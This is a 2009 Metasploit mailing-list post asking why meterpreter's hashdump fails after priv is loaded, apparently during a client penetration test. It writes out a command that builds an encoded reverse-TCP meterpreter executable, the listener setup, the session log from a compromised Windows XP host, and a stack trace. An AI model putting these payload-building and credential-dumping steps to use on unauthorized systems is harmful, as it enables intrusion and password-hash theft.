Metasploit mailing list archives
Problem with meterpreter, priv, hashdump, etc.
From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Sat, 18 Apr 2009 19:24:45 +0000
Hi all,

I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool. However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system. Here's the scenario:

I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a new call to msfconsole before starting.

I created an executable with the following command:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

I started msfconsole (as root) with an rc file:

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST x.x.x.x
    set LPORT 443
    exploit

My session started just fine:

    resource> use exploit/multi/handler
    resource> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource> set LHOST x.x.x.x
    LHOST => x.x.x.x
    resource> set LPORT 443
    LPORT => 443
    resource> exploit
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...

On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session:

    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.

    meterpreter > sysinfo
    Computer: sanitized for the clients protection!
    OS      : Windows XP (Build 2600, Service Pack 3).

    meterpreter > ls

    Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
    =====================================================

    Mode             Size  Type  Last modified                   Name
    ----             ----  ----  -------------                   ----
    40777/rwxrwxrwx  0     dir   Wed Dec 31 19:00:00 -0500 1969  .
    40777/rwxrwxrwx  0     dir   Wed Dec 31 19:00:00 -0500 1969  ..
etc. etc. etc.

However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors. I got no errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'.

    meterpreter > hashdump
    [-] Error running command hashdump: wrong number of arguments (0 for 1)
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `initialize'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `exception'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `raise'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `send_request'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in `sam_hashes'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `call'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `run'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in `load_resource'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `each_line'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in `initialize'
    ./msfconsole:82:in `new'
    ./msfconsole:82

Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some other factor?
Thanks in advance for any suggestions or insight.